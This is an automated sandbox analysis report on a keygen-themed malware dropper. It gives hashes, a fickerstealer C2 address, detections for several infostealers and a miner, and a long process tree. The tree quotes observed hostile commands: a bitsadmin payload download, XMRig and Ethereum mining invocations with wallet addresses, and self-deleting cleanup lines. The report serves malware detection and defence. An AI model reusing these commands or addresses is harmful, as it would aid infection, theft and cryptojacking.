Resubmissions

25-04-2021 09:42

210425-v9mttlcxke 10

25-04-2021 08:59

210425-1d89vxfyln 10

25-04-2021 07:37

210425-b8smdccdwe 10

25-04-2021 06:55

210425-1csfnkw57n 10

24-04-2021 20:32

210424-x7kp9rrf4x 10

Analysis

  • max time kernel
    1802s
  • max time network
    1801s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-04-2021 20:32

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 53 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 61 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2660
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2652
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2572
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2348
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2328
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1976
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1416
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1368
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1148
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1100
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:380
                    • C:\Users\Admin\AppData\Roaming\jecjbce
                      C:\Users\Admin\AppData\Roaming\jecjbce
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5820
                      • C:\Users\Admin\AppData\Roaming\jecjbce
                        C:\Users\Admin\AppData\Roaming\jecjbce
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5192
                    • C:\Users\Admin\AppData\Roaming\stcjbce
                      C:\Users\Admin\AppData\Roaming\stcjbce
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4812
                    • C:\Users\Admin\AppData\Roaming\jecjbce
                      C:\Users\Admin\AppData\Roaming\jecjbce
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4760
                      • C:\Users\Admin\AppData\Roaming\jecjbce
                        C:\Users\Admin\AppData\Roaming\jecjbce
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4124
                    • C:\Users\Admin\AppData\Roaming\stcjbce
                      C:\Users\Admin\AppData\Roaming\stcjbce
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5284
                    • C:\Users\Admin\AppData\Roaming\jecjbce
                      C:\Users\Admin\AppData\Roaming\jecjbce
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5504
                      • C:\Users\Admin\AppData\Roaming\jecjbce
                        C:\Users\Admin\AppData\Roaming\jecjbce
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2152
                    • C:\Users\Admin\AppData\Roaming\stcjbce
                      C:\Users\Admin\AppData\Roaming\stcjbce
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5772
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll",ltJNQrS
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:5788
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:996
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3872
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3708
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3856
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3612
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4612
                        • C:\Users\Admin\AppData\Local\Temp\is-36A7B.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-36A7B.tmp\Install.tmp" /SL5="$4019A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4644
                          • C:\Users\Admin\AppData\Local\Temp\is-V3EMC.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-V3EMC.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4732
                            • C:\Program Files\Windows Portable Devices\LSGVEOOFXJ\ultramediaburner.exe
                              "C:\Program Files\Windows Portable Devices\LSGVEOOFXJ\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:4972
                              • C:\Users\Admin\AppData\Local\Temp\is-808PH.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-808PH.tmp\ultramediaburner.tmp" /SL5="$601FE,281924,62464,C:\Program Files\Windows Portable Devices\LSGVEOOFXJ\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:5004
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5064
                            • C:\Users\Admin\AppData\Local\Temp\7b-50af9-e23-ea391-99b14118d6969\Beferobume.exe
                              "C:\Users\Admin\AppData\Local\Temp\7b-50af9-e23-ea391-99b14118d6969\Beferobume.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5076
                            • C:\Users\Admin\AppData\Local\Temp\3a-a9162-33a-70a90-7bfee9094b849\ZHinipudaqa.exe
                              "C:\Users\Admin\AppData\Local\Temp\3a-a9162-33a-70a90-7bfee9094b849\ZHinipudaqa.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4112
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\er01n4cw.hes\instEU.exe & exit
                                6⤵
                                  PID:4704
                                  • C:\Users\Admin\AppData\Local\Temp\er01n4cw.hes\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\er01n4cw.hes\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4140
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lp5x4x31.zvd\google-game.exe & exit
                                  6⤵
                                    PID:4776
                                    • C:\Users\Admin\AppData\Local\Temp\lp5x4x31.zvd\google-game.exe
                                      C:\Users\Admin\AppData\Local\Temp\lp5x4x31.zvd\google-game.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5348
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                        8⤵
                                        • Loads dropped DLL
                                        PID:5508
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zyjakihq.l1r\md1_1eaf.exe & exit
                                    6⤵
                                      PID:5488
                                      • C:\Users\Admin\AppData\Local\Temp\zyjakihq.l1r\md1_1eaf.exe
                                        C:\Users\Admin\AppData\Local\Temp\zyjakihq.l1r\md1_1eaf.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Checks whether UAC is enabled
                                        PID:6128
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\opdcnn30.5ko\y1.exe & exit
                                      6⤵
                                        PID:5912
                                        • C:\Users\Admin\AppData\Local\Temp\opdcnn30.5ko\y1.exe
                                          C:\Users\Admin\AppData\Local\Temp\opdcnn30.5ko\y1.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:5164
                                          • C:\Users\Admin\AppData\Local\Temp\NpYJ98tNBI.exe
                                            "C:\Users\Admin\AppData\Local\Temp\NpYJ98tNBI.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            PID:4420
                                            • C:\Users\Admin\AppData\Roaming\1619296672610.exe
                                              "C:\Users\Admin\AppData\Roaming\1619296672610.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619296672610.txt"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:4788
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\NpYJ98tNBI.exe"
                                              9⤵
                                                PID:4920
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 127.0.0.1 -n 3
                                                  10⤵
                                                  • Runs ping.exe
                                                  PID:6000
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\opdcnn30.5ko\y1.exe"
                                              8⤵
                                                PID:4560
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /T 10 /NOBREAK
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:2680
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z2rl4n1q.xsd\askinstall39.exe & exit
                                            6⤵
                                              PID:4456
                                              • C:\Users\Admin\AppData\Local\Temp\z2rl4n1q.xsd\askinstall39.exe
                                                C:\Users\Admin\AppData\Local\Temp\z2rl4n1q.xsd\askinstall39.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4376
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  8⤵
                                                    PID:2272
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:5336
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\izwid3lp.4de\inst.exe & exit
                                                6⤵
                                                  PID:4940
                                                  • C:\Users\Admin\AppData\Local\Temp\izwid3lp.4de\inst.exe
                                                    C:\Users\Admin\AppData\Local\Temp\izwid3lp.4de\inst.exe
                                                    7⤵
                                                      PID:5000
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5p25jzxk.jst\SunLabsPlayer.exe /S & exit
                                                    6⤵
                                                      PID:4236
                                                      • C:\Users\Admin\AppData\Local\Temp\5p25jzxk.jst\SunLabsPlayer.exe
                                                        C:\Users\Admin\AppData\Local\Temp\5p25jzxk.jst\SunLabsPlayer.exe /S
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        PID:5484
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5332
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              9⤵
                                                                PID:6096
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:4496
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5680
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4940
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:4640
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4876
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Checks for any installed AV software in registry
                                                                        PID:2200
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          9⤵
                                                                            PID:4940
                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                          8⤵
                                                                          • Download via BitsAdmin
                                                                          PID:2192
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peb4jzywoorYfqjx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          PID:6004
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            PID:5000
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pacW6lxxG1IaGlAt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:4540
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4848
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5968
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:4732
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:1256
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4952
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll" ltJNQrS
                                                                                    8⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:6076
                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ltJNQrS\ltJNQrS.dll" ltJNQrS
                                                                                      9⤵
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in System32 directory
                                                                                      PID:5672
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:5812
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Blocklisted process makes network request
                                                                                    PID:4996
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:4712
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:5440
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgBB78.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:3332
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            9⤵
                                                                                            • Modifies registry class
                                                                                            PID:5864
                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:4208
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cnaqaoux.bwf\GcleanerWW.exe /mixone & exit
                                                                                      6⤵
                                                                                        PID:4896
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gchzwrrb.akh\toolspab1.exe & exit
                                                                                        6⤵
                                                                                          PID:4940
                                                                                          • C:\Users\Admin\AppData\Local\Temp\gchzwrrb.akh\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\gchzwrrb.akh\toolspab1.exe
                                                                                            7⤵
                                                                                              PID:5876
                                                                                              • C:\Users\Admin\AppData\Local\Temp\gchzwrrb.akh\toolspab1.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\gchzwrrb.akh\toolspab1.exe
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5928
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sda1xl5e.d2j\c7ae36fa.exe & exit
                                                                                            6⤵
                                                                                              PID:4796
                                                                                              • C:\Users\Admin\AppData\Local\Temp\sda1xl5e.d2j\c7ae36fa.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\sda1xl5e.d2j\c7ae36fa.exe
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:4492
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\okeh4lgi.wzb\app.exe /8-2222 & exit
                                                                                              6⤵
                                                                                                PID:4868
                                                                                                • C:\Users\Admin\AppData\Local\Temp\okeh4lgi.wzb\app.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\okeh4lgi.wzb\app.exe /8-2222
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4696
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\okeh4lgi.wzb\app.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\okeh4lgi.wzb\app.exe" /8-2222
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:4768
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies system certificate store
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4176
                                                                                        • C:\Users\Admin\AppData\Roaming\5605.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\5605.tmp.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4612
                                                                                          • C:\Users\Admin\AppData\Roaming\5605.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\5605.tmp.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks processor information in registry
                                                                                            PID:5824
                                                                                        • C:\Users\Admin\AppData\Roaming\5952.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\5952.tmp.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Adds Run key to start application
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4704
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w5460@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                            4⤵
                                                                                              PID:5124
                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                              -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w12186 --cpu-max-threads-hint 50 -r 9999
                                                                                              4⤵
                                                                                              • Blocklisted process makes network request
                                                                                              PID:5364
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                            3⤵
                                                                                              PID:5128
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping 127.0.0.1
                                                                                                4⤵
                                                                                                • Runs ping.exe
                                                                                                PID:6096
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4996
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:4912
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
